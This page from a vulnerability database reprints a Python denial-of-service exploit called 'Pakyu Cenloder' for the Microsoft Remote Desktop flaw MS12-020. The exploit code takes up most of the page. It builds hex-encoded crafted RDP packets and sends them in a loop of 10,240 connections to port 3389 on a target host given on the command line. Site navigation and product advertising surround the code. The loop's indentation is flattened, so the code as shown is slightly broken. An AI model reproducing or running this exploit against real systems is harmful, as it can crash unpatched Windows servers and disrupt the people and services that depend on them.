Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Pakyu Cenloder Microsoft Remote Desktop Denial Of Service

🗓️ 17 Mar 2012 00:00:00Reported by BMarioType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 23 Views

Microsoft Remote Desktop Denial Of Service exploit by Pakyu Cenloder, using vulnerability MS12-020, allows remote attackers to cause a denial of service (use after free) via crafted packets to port 3389. Tested on Windows 7 32bit

Code
`# Exploit Title: Pakyu Cenloder  
# Date: March 16 2012  
# Author: BMario  
# Application Link: Microsoft Terminal Services / Remote Desktop Services  
# http://msdn.microsoft.com/en-us/library/aa383015(v=vs.85).aspx  
# Version: any Windows version before 13 Mar 2012  
# Platforms: Windows  
# Bug: use after free  
# Exploitation: remote, versus server  
# Author: Stanley Marshall  
# Tested on: Windows 7 32bit  
# CVE : MS12-020  
  
import socket  
import sys  
  
headpack = "030000130ee000000000000100080000000000".decode('hex')  
dafuq = "030001d602f0807f658201940401010401010101ff30190204000000000204000000020204000000000204000000010204000000000204000000010202ffff020400000002301902040000000102040000000102040000000102040000000102040000000002040000000102020420020400000002301c0202ffff0202fc170202ffff0204000000010204000000000204000000010202ffff02040000000204820133000500147c0001812a000800100001c00044756361811c01c0d800040008008002e00101ca03aa09040000ce0e000048004f005300540000000000000000000000000000000000000000000000000004000000000000000c0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001ca010000000000100007000100300030003000300030002d003000300030002d0030003000300030003000300030002d003000300030003000300000000000000000000000000000000000000000000000000004c00c000d0000000000000002c00c001b0000000000000003c02c0003000000726470647200000000008080636c6970726472000000a0c0726470736e640000000000c0".decode('hex')  
dafree = "0300000802f08028".decode('hex')  
  
trololo = headpack+dafuq+dafree  
  
HOSTNYO = sys.argv[1]  
PORTNYO = 3389  
for i in range(10240):  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
s.connect((HOSTNYO,PORTNYO))  
s.send(trololo)  
rec = s.recv(1024)  
s.close()  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
17 Mar 2012 00:00Current
7.4High risk
Vulners AI Score7.4
microsoft remote desktop denial of servicepakyu cenloderms12-020remote attackcrafted packetsport 3389use after freewindows 7
23